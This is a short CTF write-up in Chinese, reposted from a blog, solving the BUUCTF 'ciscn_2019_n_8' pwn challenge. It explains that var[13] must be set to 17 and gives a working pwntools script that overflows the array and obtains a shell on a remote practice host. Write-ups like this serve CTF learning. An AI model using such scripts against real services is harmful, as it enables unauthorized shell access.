[BUUCTF]ciscn_2019_n_8
题目
解题
先连接看看有什么信息
返回what's your name
没有其他信息
看程序基本信息
32位
拉到ida32查看
打开发现如下
由上述代码可知,需要将数组0-12装满,装什么都可以,将var[13]=17才能执行system("/bin/sh")
payload
from pwn import * #引入pwntools库
p=remote("node5.buuoj.cn",29632)#配置nc链接,连接服务器
payload=b'a'*13*4+p32(17)
#p32是针对32位程序,p64是针对64位程序,把字符转为hex
#0-12的空间装满,var[13]=17
#b表示一个字节字符串
#从ida中查看可知,init类型,4字节(数组里存储的内容有变量类型,所以内存空间需要乘4)
p.sendline(payload)#发送攻击字符串
p.interactive()#程序交互
运行脚本文件 可得到
找到flag
学习参考连接:
PWN入门3-填充数据和写一个简单攻击脚本_哔哩哔哩_bilibili
原文地址:https://blog.csdn.net/gsumall04/article/details/144121779
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!